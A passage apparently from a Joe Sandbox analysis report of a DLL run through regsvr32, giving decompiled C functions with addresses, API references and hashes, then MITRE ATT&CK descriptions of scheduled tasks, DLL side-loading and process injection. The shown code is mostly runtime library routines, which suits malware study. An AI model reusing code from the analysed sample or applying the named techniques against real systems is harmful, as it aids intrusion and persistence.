								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F84DF59(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t12 = E6F84DC48(1, 0x364); // executed
										_t54 = _t12;
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F84DF59(__eflags,  *0x6f85c110, _t54);
											if(__eflags != 0) {
												E6F84D7BE(_t54, 0x6f85d850);
												E6F84DC0E(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F84DF59(__eflags,  *0x6f85c110, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F84DF59(0,  *0x6f85c110, 0);
											_push(0);
											L41:
											E6F84DC0E();
											goto L36;
										}
									}
								} else {
									_t54 = E6F84DF1A(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f85c110; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6f84d9bc
0x6f84d9bc
0x6f84d9c7
0x6f84d9c9
0x6f84d9ce
0x6f84d9d1
0x6f84d9ef
0x6f84d9f2
0x6f84d9f7
0x6f84d9f9
0x00000000
0x6f84d9fb
0x6f84da07
0x6f84da0a
0x6f84da0b
0x6f84da0d
0x6f84da32
0x6f84da34
0x6f84da4d
0x6f84da54
0x6f84da59
0x00000000
0x6f84da36
0x6f84da36
0x6f84da3f
0x6f84da44
0x00000000
0x6f84da44
0x6f84da0f
0x6f84da0f
0x6f84da0f
0x6f84da18
0x6f84da1d
0x6f84da1e
0x6f84da1e
0x6f84da23
0x00000000
0x6f84da23
0x6f84da0d
0x6f84d9d3
0x6f84d9d9
0x6f84d9dd
0x6f84d9ea
0x00000000
0x6f84d9df
0x6f84d9e2
0x6f84da5c
0x6f84da5c
0x6f84d9e4
0x6f84d9e4
0x6f84d9e4
0x6f84d9e6
0x6f84d9e6
0x6f84d9e6
0x6f84d9e2
0x6f84d9dd
0x6f84da5f
0x6f84da67
0x6f84da69
0x6f84da6b
0x6f84da73
0x6f84da78
0x6f84da79
0x6f84da7e
0x6f84da7f
0x6f84da82
0x6f84da9c
0x6f84da9f
0x6f84daa4
0x6f84daa6
0x00000000
0x6f84daa8
0x6f84dab4
0x6f84dab7
0x6f84dab8
0x6f84daba
0x6f84dadd
0x6f84dadf
0x6f84daf6
0x6f84dafd
0x6f84db02
0x00000000
0x6f84dae1
0x6f84dae8
0x6f84daed
0x00000000
0x6f84daed
0x6f84dabc
0x6f84dac3
0x6f84dac8
0x6f84dac9
0x6f84dac9
0x6f84dace
0x00000000
0x6f84dace
0x6f84daba
0x6f84da84
0x6f84da8a
0x6f84da8c
0x6f84da8e
0x6f84da97
0x00000000
0x6f84da90
0x6f84da90
0x6f84da93
0x6f84db0d
0x6f84db0d
0x6f84db12
0x6f84db15
0x6f84db16
0x6f84db17
0x6f84db1e
0x6f84db20
0x6f84db25
0x6f84db28
0x6f84db46
0x6f84db49
0x6f84db4e
0x6f84db50
0x00000000
0x6f84db52
0x6f84db59
0x6f84db5e
0x6f84db62
0x6f84db64
0x6f84db89
0x6f84db8b
0x6f84dba4
0x6f84dbab
0x00000000
0x6f84db8d
0x6f84db8d
0x6f84db96
0x6f84db9b
0x00000000
0x6f84db9b
0x6f84db66
0x6f84db66
0x6f84db66
0x6f84db6f
0x6f84db74
0x6f84db75
0x6f84db75
0x00000000
0x6f84db7a
0x6f84db64
0x6f84db2a
0x6f84db30
0x6f84db32
0x6f84db34
0x6f84db41
0x00000000
0x6f84db36
0x6f84db36
0x6f84db39
0x6f84dbb3
0x6f84dbb3
0x6f84db3b
0x6f84db3b
0x6f84db3b
0x6f84db3b
0x6f84db3d
0x6f84db3d
0x6f84db3d
0x6f84db39
0x6f84db34
0x6f84dbb6
0x6f84dbbe
0x6f84dbc0
0x6f84dbc0
0x6f84dbc7
0x6f84da95
0x6f84db05
0x6f84db05
0x6f84db07
0x00000000
0x6f84db09
0x6f84db0c
0x6f84db0c
0x6f84db07
0x6f84da93
0x6f84da8e
0x6f84da6d
0x6f84da72
0x6f84da72

APIs

GetLastError.KERNEL32(?,?,?,6F850D69,?,00000001,6F84E2F7,?,6F851223,00000001,?,?,?,6F84E286,?,00000000), ref: 6F84D9C1
_free.LIBCMT ref: 6F84DA1E
_free.LIBCMT ref: 6F84DA54
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F851223,00000001,?,?,?,6F84E286,?,00000000,00000000,6F85A968,0000002C,6F84E2F7), ref: 6F84DA5F

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 568b7a6a15ccd1c3670b23fe9a3986c6d6958096eeb56c6ac8758ce6bcc8a009
Instruction ID: 7a15a007bec5e4c79f8d7c6658db5d88f18fcdea29e23218162d7c15600073f9
Opcode Fuzzy Hash: 568b7a6a15ccd1c3670b23fe9a3986c6d6958096eeb56c6ac8758ce6bcc8a009
Instruction Fuzzy Hash: 5A11E03364870D7B9B55867C4C86A2A269B9BC33BC7200EE5F538DE2C1DF69CC25C5A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F852BEE Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F852BEE(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f85c860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F852BD7();
					E6F852B99();
					_t13 = WriteConsoleW( *0x6f85c860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f852c0b
0x6f852c0f
0x6f852c1c
0x6f852c21
0x6f852c3c
0x6f852c3c
0x6f852c42

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001), ref: 6F852C05
GetLastError.KERNEL32(?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?,00000001,?,6F851244,6F84E286), ref: 6F852C11

Part of subcall function 6F852BD7: CloseHandle.KERNEL32(FFFFFFFE,6F852C21,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?,00000001), ref: 6F852BE7

___initconout.LIBCMT ref: 6F852C21

Part of subcall function 6F852B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F852BC8,6F852777,00000001,?,6F850CF8,?,?,00000001,?), ref: 6F852BAC

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6F85278A,?,00000001,?,00000001,?,6F850CF8,?,?,00000001,?), ref: 6F852C36

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3c6cb79b9cdb48a9429b71476b99fb8f8672edfa90eb0b72fe14f07a2adab0cc
Instruction ID: b469e2616976a60d9de8277409ce9848ed0e5d3ab303db6be9c6b75be55c7c7c
Opcode Fuzzy Hash: 3c6cb79b9cdb48a9429b71476b99fb8f8672edfa90eb0b72fe14f07a2adab0cc
Instruction Fuzzy Hash: 5BF01C36100618BBCF921FA9CC089893F66FF0B7B5B004490FA189D160CB369870EBD5

Uniqueness

Uniqueness Score: -1.00%

Function 6F84D260 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F84D260() {

				E6F84DC0E( *0x6f85d844);
				 *0x6f85d844 = 0;
				E6F84DC0E( *0x6f85d848);
				 *0x6f85d848 = 0;
				E6F84DC0E( *0x6f85d9c8);
				 *0x6f85d9c8 = 0;
				E6F84DC0E( *0x6f85d9cc);
				 *0x6f85d9cc = 0;
				return 1;
			}

0x6f84d269
0x6f84d276
0x6f84d27c
0x6f84d287
0x6f84d28d
0x6f84d298
0x6f84d29e
0x6f84d2a6
0x6f84d2af

APIs

_free.LIBCMT ref: 6F84D269

Part of subcall function 6F84DC0E: RtlFreeHeap.NTDLL(00000000,00000000,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?), ref: 6F84DC24
Part of subcall function 6F84DC0E: GetLastError.KERNEL32(?,?,6F85199E,?,00000000,?,?,?,6F8519C5,?,00000007,?,?,6F8504FE,?,?), ref: 6F84DC36

_free.LIBCMT ref: 6F84D27C
_free.LIBCMT ref: 6F84D28D
_free.LIBCMT ref: 6F84D29E

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 153a9780aa78d4a878e3d88310d67691e8d57e45ee6b3cf9399a033d7d4fad8e
Instruction ID: 73cd7b2f01f144926092212072c7ef0c3c0a2de06b571222c8015f9ec2949b6c
Opcode Fuzzy Hash: 153a9780aa78d4a878e3d88310d67691e8d57e45ee6b3cf9399a033d7d4fad8e
Instruction Fuzzy Hash: 1BE04F77809A28EB8F929F5886044453FB7E78673830109C6EC000A361E7B94073DBC2

Uniqueness

Uniqueness Score: -1.00%

Function 6F84C978 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6F84C978(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6F84F8D2(_t48);
						E6F84F319(_t48, _t57, 0, 0x6f85d430, 0, 0x6f85d430, 0x104);
						_t26 =  *0x6f85d9d0; // 0x2f53288
						 *0x6f85d9c0 = 0x6f85d430;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f85d430;
							_v20 = 0x6f85d430;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F84CC22(E6F84CAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F84CAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F84F20C(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6f85d9c4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f85d9c8 = _t58;
											L18:
											E6F84DC0E(_t37);
											_v12 = 0;
											L19:
											E6F84DC0E(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f85d9c4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f85d9c8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F84D46D(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F84D46D(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F84C24F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6f84c978
0x6f84c981
0x6f84c986
0x6f84c990
0x6f84c993
0x6f84c9b0
0x6f84c9b1
0x6f84c9c4
0x6f84c9c9
0x6f84c9d1
0x6f84c9d7
0x6f84c9da
0x6f84c9dc
0x6f84c9e3
0x6f84c9e3
0x6f84c9e5
0x6f84c9e8
0x6f84c9eb
0x6f84c9f2
0x6f84ca0b
0x6f84ca10
0x6f84ca12
0x6f84ca33
0x6f84ca3b
0x6f84ca3e
0x6f84ca59
0x6f84ca5c
0x6f84ca63
0x6f84ca67
0x6f84ca69
0x6f84ca70
0x6f84ca73
0x6f84ca75
0x6f84ca77
0x6f84ca79
0x6f84ca83
0x6f84ca83
0x6f84ca85
0x6f84ca8b
0x6f84ca8e
0x6f84ca90
0x6f84ca96
0x6f84ca97
0x6f84ca9d
0x6f84caa0
0x6f84caa1
0x6f84caa7
0x6f84caaa
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84ca7b
0x6f84ca7b
0x6f84ca7b
0x6f84ca7e
0x6f84ca7f
0x6f84ca7f
0x00000000
0x6f84ca7b
0x6f84ca6b
0x00000000
0x6f84ca6b
0x6f84ca43
0x6f84ca43
0x6f84ca44
0x6f84ca49
0x6f84ca4b
0x6f84ca4d
0x6f84ca52
0x6f84ca52
0x00000000
0x6f84ca52
0x6f84ca14
0x6f84ca19
0x6f84ca1b
0x6f84ca1c
0x00000000
0x6f84ca1c
0x6f84c9de
0x6f84c9e1
0x00000000
0x00000000
0x00000000
0x6f84c9e1
0x6f84c995
0x6f84c998
0x00000000
0x00000000
0x6f84c99a
0x6f84c9a1
0x6f84c9a2
0x6f84c9a4
0x6f84c9a9
0x00000000
0x6f84c9a9
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F84C9BB, 6F84C9F8

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: a643c05b8750da4d102535eaec035b1dfac236082660cb7598d07ee5d718654e
Instruction ID: a71069dc610b8636272bdcd76615ae4bb212ee0b56ec3f5ac59ede5891cf2eff
Opcode Fuzzy Hash: a643c05b8750da4d102535eaec035b1dfac236082660cb7598d07ee5d718654e
Instruction Fuzzy Hash: 8241BFB2A0421CBFDB15CBADD98599EBBFDEF86310B0008E6E400DF241E7709A55C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6F84B475 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6F84B475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6F84AD86(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6F84AD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6F84A645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6F84A578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6F84B04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6F84D547(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6f84b475
0x6f84b475
0x6f84b47c
0x6f84b485
0x6f84b5a4
0x6f84b48b
0x6f84b48b
0x6f84b48c
0x6f84b48d
0x6f84b497
0x6f84b49a
0x6f84b4a0
0x6f84b4aa
0x6f84b4cf
0x6f84b4d4
0x6f84b4d9
0x6f84b5a0
0x00000000
0x6f84b5a1
0x6f84b4d9
0x6f84b4aa
0x6f84b4df
0x6f84b4e2
0x6f84b4e5
0x6f84b4eb
0x6f84b4f1
0x6f84b503
0x6f84b508
0x6f84b50b
0x6f84b50e
0x6f84b511
0x6f84b514
0x6f84b51a
0x6f84b520
0x6f84b523
0x6f84b526
0x6f84b535
0x6f84b536
0x6f84b536
0x6f84b53b
0x6f84b54e
0x6f84b550
0x6f84b555
0x6f84b560
0x6f84b562
0x6f84b564
0x6f84b580
0x6f84b585
0x6f84b588
0x6f84b588
0x6f84b560
0x6f84b555
0x6f84b58e
0x6f84b58f
0x6f84b592
0x6f84b595
0x6f84b598
0x6f84b59b
0x6f84b526
0x00000000
0x6f84b51a
0x6f84b5a5
0x6f84b5aa
0x6f84b5ae
0x6f84b5b1
0x6f84b5b2
0x6f84b5b3
0x6f84b5b4
0x6f84b5b9
0x6f84b631
0x6f84b633
0x6f84b5bb
0x6f84b5bb
0x6f84b5c1
0x00000000
0x6f84b5c3
0x6f84b5c6
0x6f84b5c9
0x6f84b5d0
0x6f84b5d3
0x6f84b5d7
0x6f84b609
0x6f84b60c
0x6f84b613
0x6f84b619
0x6f84b623
0x6f84b62c
0x6f84b62c
0x6f84b623
0x6f84b619
0x6f84b62d
0x6f84b5d9
0x6f84b5d9
0x6f84b5d9
0x6f84b5dc
0x6f84b5dc
0x6f84b5e0
0x00000000
0x00000000
0x6f84b5e4
0x6f84b5f8
0x6f84b5f8
0x6f84b5e6
0x6f84b5e6
0x6f84b5ec
0x00000000
0x6f84b5ee
0x6f84b5ee
0x6f84b5f1
0x6f84b5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f84b5f6
0x6f84b5ec
0x6f84b601
0x6f84b603
0x00000000
0x6f84b605
0x6f84b605
0x6f84b605
0x00000000
0x6f84b603
0x6f84b5fc
0x6f84b5fe
0x00000000
0x6f84b5fe
0x00000000
0x00000000
0x00000000
0x6f84b5c9
0x6f84b5c1
0x6f84b634
0x6f84b638
0x6f84b638

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F84B49A

Strings

RCC, xrefs: 6F84B4B4
MOC, xrefs: 6F84B4AC

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 99e51bf46c138598f287a30d65294e4a67ee3e8b6052dab195e826350155e951
Instruction ID: c491a8ed4553eb1c9bdc66435360b112155051d9fad3513d9ae3b78906806f45
Opcode Fuzzy Hash: 99e51bf46c138598f287a30d65294e4a67ee3e8b6052dab195e826350155e951
Instruction Fuzzy Hash: 0F41297190020DAFCF09CF98CD81AEEBBB5FF48314F158899EA246A251D335E961DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6F849CF7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F849CF7(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6F849D4A(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6f840000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6f840000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6f8553dc;
				if(E6F845D50(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6f85cb28 = 1;
				}
				return _t13;
			}

0x6f849cf8
0x6f849cfa
0x6f849d04
0x6f849d0d
0x6f849d10
0x6f849d13
0x6f849d1a
0x6f849d28
0x6f849d32
0x6f849d39
0x6f849d39
0x6f849d3f
0x6f849d3f
0x6f849d49

APIs

Part of subcall function 6F845D50: GetLastError.KERNEL32(?,?,?,6F85A66C), ref: 6F845D74

IsDebuggerPresent.KERNEL32(?,?,6F85A66C,?,?,?,?,?,?,?,00000000,?,6F8546B0,000000FF,?,6F841E0A), ref: 6F849D2A
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,6F85A66C,?,?,?,?,?,?,?,00000000,?,6F8546B0,000000FF), ref: 6F849D39

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6F849D34

Memory Dump Source

Source File: 00000026.00000002.798203237.000000006F841000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F840000, based on PE: true

Associated: 00000026.00000002.798195732.000000006F840000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798217144.000000006F855000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798226864.000000006F85C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000026.00000002.798233382.000000006F85E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_6f840000_regsvr32.jbxd

Similarity

API ID: DebugDebuggerErrorLastOutputPresentString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 389471666-631824599
Opcode ID: c5b8c58cbdac253f88d8ee254b9d9b4d2a9a60d6e1ccec2e64bc0e1801d27457
Instruction ID: 2d4919269dd02dfef153cf0861c369a07b01a2371080effb5e8c89fa9f3a7bbe
Opcode Fuzzy Hash: c5b8c58cbdac253f88d8ee254b9d9b4d2a9a60d6e1ccec2e64bc0e1801d27457
Instruction Fuzzy Hash: DAE039701007048BDBB48F2CD504386BAE0AF06228F408CEDD45ACE244E7B9A098CB91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
